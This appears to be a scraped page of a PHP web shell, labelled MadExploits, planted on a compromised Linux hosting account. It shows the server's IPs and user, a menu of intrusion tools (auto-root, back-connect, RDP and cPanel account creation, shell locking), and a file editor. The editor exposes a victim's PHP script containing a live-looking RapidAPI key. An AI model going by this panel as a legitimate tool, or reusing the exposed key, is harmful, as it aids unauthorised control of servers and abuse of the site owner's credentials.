Linux dpw.dpwebtech.com 3.10.0-1160.88.1.el7.x86_64 #1 SMP Tue Mar 7 15:41:52 UTC 2023 x86_64
Apache
: 192.232.243.69 | : 18.219.205.55
54 Domain
7.3.33
dpclient
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
dpclient /
public_html /
AI_Render /
[ HOME SHELL ]
Name
Size
Permission
Action
index.html
1.96
KB
-rw-r--r--
php-data.php
784
B
-rw-r--r--
script.js
1.48
KB
-rw-r--r--
style.css
1.08
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : php-data.php
<?php $curl = curl_init(); curl_setopt_array($curl, [ CURLOPT_URL => "https://chatgpt-ai-chat-bot.p.rapidapi.com/ask", CURLOPT_RETURNTRANSFER => true, CURLOPT_FOLLOWLOCATION => true, CURLOPT_ENCODING => "", CURLOPT_MAXREDIRS => 10, CURLOPT_TIMEOUT => 30, CURLOPT_HTTP_VERSION => CURL_HTTP_VERSION_1_1, CURLOPT_CUSTOMREQUEST => "POST", CURLOPT_POSTFIELDS => "{\r \"query\": \"Hello\"\r }", CURLOPT_HTTPHEADER => [ "X-RapidAPI-Host: chatgpt-ai-chat-bot.p.rapidapi.com", "X-RapidAPI-Key: c3e7e0f9a2msh9541025fef72972p19b90ejsn2b4a44807bbe", "content-type: application/json" ], ]); $response = curl_exec($curl); $err = curl_error($curl); curl_close($curl); if ($err) { echo "cURL Error #:" . $err; } else { print_r($response); }
Close